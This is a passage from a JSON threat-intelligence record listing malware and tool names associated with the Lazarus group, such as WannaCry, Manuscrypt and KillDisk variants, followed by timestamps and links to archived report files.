				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439055,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.pdf",
		"text": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.txt",
		"img": "https://archive.orkl.eu/dddfee5671f3436a8a1a59845e4983c3453df15b.jpg"
	}
}